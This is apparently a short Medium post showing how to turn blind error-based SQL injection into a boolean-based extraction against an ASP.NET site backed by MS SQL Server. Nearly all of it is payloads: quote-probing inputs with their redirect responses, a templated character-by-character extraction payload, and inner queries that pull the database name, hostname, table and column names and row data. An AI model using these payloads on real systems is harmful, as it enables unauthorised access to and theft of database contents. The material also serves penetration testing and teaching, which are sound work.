Turning Blind Error Based SQL Injection into Exploitable Boolean One

name='  -> Redirecting to /Error.aspx page
name='' -> Redirecting to /AccessDenied.aspx page
name='''    -> Redirecting to /Error.aspx page
name='''' -> Redirecting to /AccessDenied.aspx page
name=''''' -> Redirecting to /Error.aspx page
name='''''' -> Redirecting to /AccessDenied.aspx page
'+convert(int,db_name())+' -> Redirecting to /Error.aspx page
'+convert(char,db_name())+' -> Redirecting to /AccessDenied.aspx page
'+convert(char,(SELECT IIF(SUBSTRING(DB_NAME(),1,1)='A',3,@@VERSION)))+' -> Redirecting to /AccessDenied.aspx
Main query for Blind Error Based Injection: '%2bconvert(char,(SELECT IIF(SUBSTRING((***query_here***),1,1)='d',3,@@VERSION)))%2bQueries inside to the main query:-> select db_name() 
<- Returns current database name
-> select host_name()
<- Returns hostname
-> select top 1 table_name from INFORMATION_SCHEMA.tables
<- Returns the first table from Information Schema
-> select top 1 column_name from INFORMATION_SCHEMA.columns
<- Returns the first column from Information Schema
-> select ***column_name*** from ***table_name*** ORDER BY ***column_name*** OFFSET 2 ROW FETCH FIRST 1 ROW ONLY
<- Returns the data of the second row from selected column/table.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store